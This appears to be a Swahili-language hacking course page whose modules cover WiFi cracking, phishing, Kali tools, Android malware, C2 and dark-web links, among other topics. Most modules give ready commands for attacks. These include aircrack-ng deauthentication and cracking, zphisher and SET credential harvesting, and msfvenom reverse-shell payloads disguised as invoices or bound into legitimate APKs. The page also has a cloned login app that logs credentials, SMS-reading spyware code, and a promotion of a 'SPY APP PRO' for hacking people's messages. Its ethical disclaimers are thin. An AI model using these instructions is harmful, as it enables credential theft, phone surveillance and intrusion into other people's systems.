Coding, AI, Usalama wa Mtandao, na zaidi â Fundishwa na wataalamu.
Tazama Vipindi"Ukiniandikia tu namba ya mtu, naweza kuona SMS zake, call logs, au hata ku-monitor simu yake moja kwa moja."
Haiwezekani kwa njia yoyote ile ya ki-tech legit kufanya haya bila:
Malware (Spy Apps): Lazima iwe ime-installiwa kwenye simu ya target manually, au apewe link afungue (phishing).
Mara nyingi, mtu hujifanya ni rafiki, mpenzi au msaidizi, halafu anaomba simu kidogo â na boom, anai-infect.
PEGUS: Ni ya serikali, gharama kubwa mno (mamilioni). Hacker wa kawaida hawezi afford hata uuze figo zako!
Ni protocol ya kimataifa inayotumika kuhamisha SMS na calls kati ya mitandao. Weakness zipo lakini zinafanywa na spy agencies kama NSA, GRU.
Ni tower ya simu feki inayolazimisha simu ya mtu ku-connect nayo. Inahitaji hardware ya bei ghali na proximity ya target. Hutumiwa na governments tu.
Wanakuambia: "Nipe namba ya mtu, nitakupa SMS zake." Kumbe ni uongo wa dashboard feki au reverse engineering ya data zako mwenyewe.
Hacking ya SMS/Calls | Inawezekana? | Mahitaji |
---|---|---|
Kuandika namba tu | HAIWEZEKANI | Uongo wa matapeli |
Kuona SMS/Calls | Ndiyo | Physical access / Social Engineering |
SS7 Hack | Ndiyo | Telco access, millions in tools |
Stingray | Ndiyo | Hardware ya gharama, proximity |
"Mwenye simu ndogo huwezi kumuhack kwa tech... labda kwa hila za maisha tu"
Simu hizi hazina OS yenye uwezo wa ku-run malware au apps za kisasa kama Android/iOS.
Hakuna njia ya kutuma malware kupitia internet.
Huwezi kutumia mbinu za kisasa za kuhack.
Simu hizi ni "stupidly secure" kwa sababu ni too limited to be hacked.
Kama unataka kumhack mtu, usichague mwenye simu ndogo. Wataalamu wa cybersecurity wanapenda kusema: "The most secure system is one that doesn't exist."
(Ethical + Funny + Educational) - Accessible via TOR only (.onion links)
http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page
Hii ni kama Google ya Dark Web. Inaorodhesha tovuti nyingi za dark web (ethical & unethical â chagua vizuri). Useful for exploration (kwa makini).
http://3g2upl4pq6kufc4m.onion
Kama Google ya dark web. Haina tracking. Hii ni starter pack ya kuanza safari yako.
http://www.propub3r6espa33w.onion
Tovuti halali ya uandishi wa habari za uchunguzi. Inaonesha uhalifu, rushwa, serikali, na madudu mengine ya dunia. Imesajiliwa kihalali, ethical 100%.
http://scihub22266oqcxt.onion
Inatoa makala za kisayansi na vitabu ambavyo kawaida hulipiwa. Useful kwa wanafunzi, researchers na wasomi (ethical + educational).
http://rutorc6mqdinc4cz.onion
Makusanyo ya comics za kila aina (DC, Marvel, Japanese manga). Funny + entertaining â kwa mashabiki wa vichekesho na graphic novels.
Tofauti kwa kila taasisi (mf. BBC, NYT)
Unaruhusiwa kutoa taarifa kwa waandishi bila kujulikana. Hutumiwa na whistleblowers (ethical + safe).
http://xfmro77i3lixucja.onion
Free ebooks za aina zote: tech, hacking, fiction, motivation. Haina malware â lakini verify kila kitu kwa tahadhari.
http://msydqstlz2kzerdg.onion
Inaorodhesha tu .onion links ambazo ni ethical na salama. Ina filters â ni "cleanest" search engine ya dark web.
"Ni kama umepewa remote control ya dunia nzima mkononi"
Website hii ya kipekee inakuwezesha kutazama channel za TV kutoka kila nchi duniani â bure kabisa!
Za moja kwa moja kutoka kila kona ya dunia
Wa kila aina kutoka mataifa mbalimbali
Kutoka Asia, Afrika, na Amerika
Za kielimu na za kuvutia
https://tv.garden/cd
Tunaweza kukusaidia kwa msaada wowote au maswali.
"Hii si porojo ya YouTube. Ni lab ya hacker halisi â handshake capture hadi password crack kwa ethical use."
ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up
airodump-ng wlan0
Chagua BSSID na channel ya target.
airodump-ng --bssid [BSSID] -c [channel] -w handshake wlan0 aireplay-ng -0 5 -a [BSSID] wlan0
Hii itadeauth clients ili wa-reconnect na ku-drop handshake ambayo tunaweza ku-crack.
aircrack-ng handshake.cap -w /usr/share/wordlists/rockyou.txt
Unaweza kutumia wifiphisher au Airgeddon kutengeneza rogue AP na captive portal ya kuiba credentials.
git clone https://github.com/wifiphisher/wifiphisher cd wifiphisher sudo python3 wifiphisher.py
Usifanye haya mashambulizi kwenye router ya mtu mwingine bila ruhusa. Tumia mazingira ya majaribio pekee. Lengo ni kujifunza na kulinda, si kuiba au kuharibu.
"Phishing ni mtego wa akili unaoundwa kitaalam â na ethical hacker anatakiwa aijue ndani nje, kwa vitendo."
git clone https://github.com/htr-tech/zphisher.git cd zphisher bash zphisher.sh
Chagua target platform (Facebook, Instagram, Gmail n.k.), itakutengenezea link + local server + tunnel URL.
apt install set setoolkit
Chagua: 1) Social-Engineering Attacks â 2) Website Attack Vectors â 3) Credential Harvester Attack â 2) Site Cloner. Ingiza URL ya target kisha tumia port forwarding kutuma.
Ukiona response ya POST kwenye terminal au log ya file, unapata credentials (email, password).
"Kila ethical hacker lazima afahamu dunia ya Deep Web na Dark Web â si kwa kutenda uhalifu, bali kwa kuelewa mazingira na kujilinda ipasavyo."
Tor
. Hapa kuna anonymity na .onion domains pekee.Katika Deep Web:
Katika Dark Web:
Tor Browser
: https://www.torproject.orgduckduckgo.com
on Tor for safe dark web searchesUnaweza kutumia Tor kuchunguza kama credentials zako au za taasisi yako zimevuja kwenye forums au marketplaces. Tools kama HaveIBeenPwned
pia husaidia kwa breach analysis.
Hackers huingia kwenye database za vyuo kupitia:
"Mafanikio ya shambulizi la ethical hacker yanaanzia OSINT â usifanye exploit kabla hujachimba target yako kisanii."
Open Source Intelligence (OSINT) ni kukusanya taarifa kutoka vyanzo vya wazi â bila kudukua. Hacker hutumia OSINT kutambua emails, domains, subdomains, IPs, user habits, tech stack na hata mifumo ya ulinzi.
theHarvester -d example.com -b all
Hii italeta emails, IPs, subdomains, na hosts zinazohusiana na domain hiyo.
site:example.com ext:sql | intitle:"index of" "admin"
Hii inatafuta login pages, backups, database dumps na directories zilizowekwa public kimakosa.
whois example.com dig A example.com +short dig MX example.com
Katika Red Team engagement, hacker anaanza na OSINT â akitumia tools kama Amass
kupata subdomains kama login.dev.example.com
na kutumia nmap au Burp kuchambua udhaifu. Bila OSINT, target ingekuwa kama mti bila mizizi.
"Ethical hacking sio soft version ya hacking â ni discipline, legal permission, na mission ya kulinda, si kuvuruga."
Ethical Hacker | Black Hat Hacker |
---|---|
Anapata ruhusa (written consent) | Anaingia kimya, bila ruhusa |
Lengo: kubaini na kurekebisha udhaifu | Lengo: kuiba, kuharibu au kuuza taarifa |
Hutumia report kuwasilisha findings | Hutumia attack kuacha backdoor au rootkit |
Hulipwa kihalali na kampuni au taasisi | Huuza data au exploits kwenye dark web |
Ethical hacker anaingia kwenye kampuni akiwa na ruhusa, anafanya reconnaissance, OSINT, exploitation â lakini kila hatua anaandika ripoti na kutoa mitigation. Black hat anaingia kimya, anateka admin account, anaweka keylogger na kuacha backdoor kwa access ya baadaye.
"Kali si kwa kuangalia tu â ni OS ya mashambulizi ya maabara hadi mitaani. Lazima uitumie kama hacker halisi."
/usr/share/wordlists
(e.g. rockyou.txt)Chunguza host kwa details zote:
nmap -sS -sV -T4 -A 192.168.1.10
Hii itakuonesha open ports, services, OS fingerprint, na scripts.
gobuster dir -u http://192.168.1.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
enum4linux -a 192.168.1.10
whatweb http://192.168.1.10
Tengeneza payload ya reverse shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > shell.exe
Tuma payload kwa target na subiri connection kwenye Metasploit:
msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.7 set LPORT 4444 run
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
airmon-ng start wlan0
airodump-ng wlan0mon airodump-ng --bssid [router_mac] -c [channel] -w capture wlan0mon aireplay-ng -0 10 -a [router_mac] wlan0mon
aircrack-ng capture.cap -w /usr/share/wordlists/rockyou.txt
"Uwezo wa hacker wa kweli haupo tu kwenye code â uko kwenye ushawishi. Social engineering ni silaha ya kihuni kisanii."
Social engineering ni mchakato wa kumdanganya mtu ili afanye kitendo fulani kwa ridhaa yake mwenyewe, kama vile kutoa password, kufungua link au kuruhusu access ya mfumo. Ethical hacker hutumia hii skill kufanya Red Team simulation ya shambulizi linalolenga tabia za binadamu.
Unatengeneza document ya PDF yenye tracking pixel kupitia canarytokens.org
. Unaipeleka kwa HR ya kampuni inayolengwa kwa pretext ya job application. Mara tu HR akifungua PDF, unapata alert ya IP na timestamp. Hii ni proof ya awareness training test.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe > payload.exe
Payload hii inaweza kuwekwa kwenye autorun USB (rubber ducky) au kutumwa kama attachment.
"SIM yako ni gateway ya benki, email, crypto na identity yako. Ukidukuliwa, unaweza poteza kila kitu bila kuguswa kimwili."
Ni mbinu ambayo attacker huhamisha namba ya simu ya target kutoka SIM card halali kwenda kwenye SIM card yao â kwa kutumia social engineering au insider help. Wakiwa na namba yako, wanaweza kupokea 2FA SMS, OTP, au kufanya recovery ya account zako muhimu.
Tumia Kali kujaribu fake call simulation, kuandika OSINT script ya kukusanya user details, au kutengeneza phishing SMS kwa endpoint ya test Android device na kuona jinsi alert ya SIM inavyotokea.
"Anonymity ni ngao ya hacker â lakini kila ngao ina udhaifu wake. Fahamu VPN, Proxy na Tor kwa utumiaji halisi na mipaka yake."
Feature | VPN | Proxy | Tor |
---|---|---|---|
Encryption | Full tunnel (end-to-end) | No encryption | Multi-layer encryption |
Speed | Fast | Faster | Slowest |
Privacy Level | Medium to High | Low | Very High (anonymous routing) |
Use Case | Safe browsing, geo-unblock, hacking labs | Simple IP mask, scraping | Dark web, whistleblowing |
Unaweza kufanya multi-layer route:
sudo apt install tor proxychains nano /etc/proxychains.conf # badilisha line ya mwisho kuwa: dynamic_chain proxychains firefox duckduckgo.com
Hii huanzia kwenye proxy â halafu hupitishwa kwenye Tor â hivyo kuongeza anonymity.
"Kila hacker mzuri si tu anajua jinsi ya kupeleleza â anajua pia jinsi ya kutambua mtu anayepeleleza."
Ni apps zinazoweza kurekodi kila unachofanya bila wewe kujua: SMS, call logs, location, WhatsApp messages, kamera, na hata kelele za mazingira. Zinatumika na hackers, wapelelezi wa mahusiano, au kwa surveillance ya kampuni au serikali.
adb shell pm list packages -d adb shell dumpsys deviceidle adb shell settings list secure | grep admin
Hii itakuonyesha apps zilizofichwa au zenye admin rights zisizoeleweka.
"Hactivist ni hacker aliye na ajenda â si kwa pesa, si kwa umaarufu, bali kwa kusukumwa na falsafa, haki au mapinduzi ya kidigitali."
Ni aina ya hacking inayofanywa kwa kusudi la kisiasa, kijamii au maadili. Lengo sio pesa bali ni kuonesha udhaifu wa mfumo, kukataa sera, au kuunga mkono harakati. Mara nyingi inahusiana na freedom of information, haki za binadamu, au kuzuia censorship.
Kampeni ya OpIsrael ambayo ililenga maelfu ya domains za Israeli government. Hacktivists walitumia SQLMap kwa leaks, DDoS kwa paralisa ya site, na defacement kwa propaganda pages. Ilikuwa ni form ya protest kwa vitendo vya kijeshi dhidi ya raia.
"Hacker halisi hujifunza pande zote â jinsi ya kuvamia na jinsi ya kugundua uvamizi. Red Team ni mashambulizi, Blue Team ni ulinzi."
Ni ethical hackers wanaojaribu kuvunja mifumo ya kampuni kwa mbinu za kidigitali. Lengo ni kugundua udhaifu kabla ya hacker wa kweli kuuvumbua. Wanaiga mashambulizi ya kweli (TTPs) kwa lengo la kufundisha ulinzi.
Ni wachunguzi wa ulinzi na wataalamu wa response ambao kazi yao ni kugundua, kuzuia na kujibu mashambulizi. Wanatumia tools za kuchambua logs, traffic na alert systems.
Kigezo | Red Team | Blue Team |
---|---|---|
Lengo | Kuvunja na kupata access | Kugundua na kuzuia uvamizi |
Tools | Cobalt Strike, Metasploit, Empire, BloodHound | Splunk, ELK, Zeek, Wireshark, OSSEC |
Hatua | Recon â Exploit â Persist | Detect â Analyze â Contain |
Red Team: Inatuma payload kwa malipo ya fake invoice (.docm macro)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.2 LPORT=4444 -f exe > invoice.exe
Victim akifungua, reverse shell inarudi kwa attacker (Red Team)
Blue Team: Inatumia SIEM (kama Splunk) kuona outbound connection kutoka internal IP kwenda LHOST isiyotambulika.
index=network action=allowed dest_port=4444 | stats count by src_ip, dest_ip
Red Team hutumia MITRE matrix kuiga mashambulizi ya kweli (initial access, execution, persistence). Blue Team hutumia matrix hiyo hiyo kubuni detections na responses.
"Kama una skills za ethical hacking â kwa nini usizitumie kupata malipo halali? Bug bounty ni uwanja wa vita kwa hacker mwerevu."
Ni programu rasmi ambapo makampuni huruhusu hackers kujaribu mifumo yao kutafuta udhaifu (bugs). Ukigundua mapengo yaliyo ndani ya scope na kuripoti kwa usahihi, unaweza kulipwa maelfu ya dola.
amass enum -d target.com subfinder -d target.com nmap -sV -T4 -Pn target.com httpx -l subdomains.txt gau target.com | tee params.txt
Title: Reflected XSS on search param Summary: The search box reflects unsanitized input directly Payload: <script>alert(1)</script> Steps: 1. Go to: https://site.com/search?q=<script>alert(1)</script> 2. Script executes immediately Impact: Could lead to session hijacking or phishing
"Msimu wa hacking haukamiliki bila mobile â kuanzia Android injections hadi iOS analysis. Uwanja wa hacker wa kisasa."
Feature | Android | iOS |
---|---|---|
System Access | Open, rootable | Closed, jailbreaking needed |
App Files | APK + manifest readable | Encrypted + plist format |
Exploitation | More tools & freedom | Strict sandbox, fewer vectors |
apktool d target.apk -o decompiled/
Unapata XML files, activities, permissions, hidden URLs.
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.3 LPORT=4444 R > payload.apk
Unganisha payload kwenye legit APK kwa apktool
â then jarsigner
kwa signing.
Modify UI ya app clone, weka log function kwenye onTextChanged au onclick ya login button. Rudisha kwa APKTool na sign.
"C2 ndio moyo wa kila operation ya ethical hacker â hapa ndipo unavyoongoza mashambulizi, kupokea data, na kujenga persistence."
Command and Control (C2) ni mfumo ambao unaruhusu hacker kuwasiliana na device iliyoathiriwa. Hii ni baada ya exploit kufanikiwa. Unatumika kuamrisha, kusafirisha data, au kuanzisha backdoor.
msfconsole
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.7 set LPORT 4444 run
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > payload.exe
"Hacker wa kweli hajijengi kwa vyeti peke yake â anajijenga kwa labs, bug bounties, open-source na impact ya kweli."
"SPY APP PRO đ ni Moja kati ya powerful App ya kuhack sms na calls za Mtu na Haina mambo mengi kama app nyingine unaweza jaribu sasa"
Pakua SPY APP PRO hapa chini na uanze kuifanyia kazi moja kwa moja kwenye target yako â haraka na bila longolongo đđ˛
Call & SMS interception ni mbinu ya kupata mawasiliano ya simu na meseji kutoka kwa kifaa cha target. Kwa ethical hackers, hili hutumika kujifunza jinsi mashambulizi yanavyofanyika na namna ya kujilinda.
Tumia Android app yenye permissions:
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
Kisha tumia code kama:
Cursor cursor = getContentResolver().query(Uri.parse("content://sms/inbox"), null, null, null, null);
while (cursor.moveToNext()) {
String body = cursor.getString(cursor.getColumnIndexOrThrow("body"));
Log.d("SMS", body);
}
Tumia jadx au apktool kufanya reverse engineering ya spyware kama mSpy, FlexiSpy
Aviator ni crash game inayoruhusu watumiaji kubashiri multiplier inayopaa. Player anatakiwa ku-cashout kabla ndege haijaporomoka. Inatumia PRNG (Pseudorandom Number Generation) kwa round outcomes. Tutatumia tovuti ya demo aviatordemo.co.za kwa mafunzo haya.
Fungua browser Developer Tools â Network tab â WebSocket/XHR. Chunguza connections kama:
wss://socket.aviatordemo.co.za/rounds
Angalia fields muhimu kama: round_id
, multiplier
, timestamp
, na hash
.
{
"type": "round_start",
"multiplier": 1.84,
"timestamp": 1717003123,
"hash": "b4f1d34af..."
}
Baadhi ya formula zinazotumika:
multiplier = floor(100 * (1 / (1 - r))) / 100
Ambapo r
ni random float kutoka server seed. Ukiweza kuona seed au hash mapema, unaweza kutabiri multiplier.
Script ya JavaScript ya ku-log rounds:
const ws = new WebSocket('wss://socket.aviatordemo.co.za');
ws.onmessage = function (e) {
const data = JSON.parse(e.data);
if (data.type === 'round_start') {
console.log("Round:", data.round_id, " â ", data.multiplier);
}
};
Tumia Tampermonkey au console ya browser kufuatilia data hizi.
Kigezo | Halali | Haramu |
---|---|---|
Kujifunza site za demo | â | |
Kutumia scripts kwenye betting halisi | â | |
Reverse engineering kwa research | â | |
Kudanganya system au manipulation | â |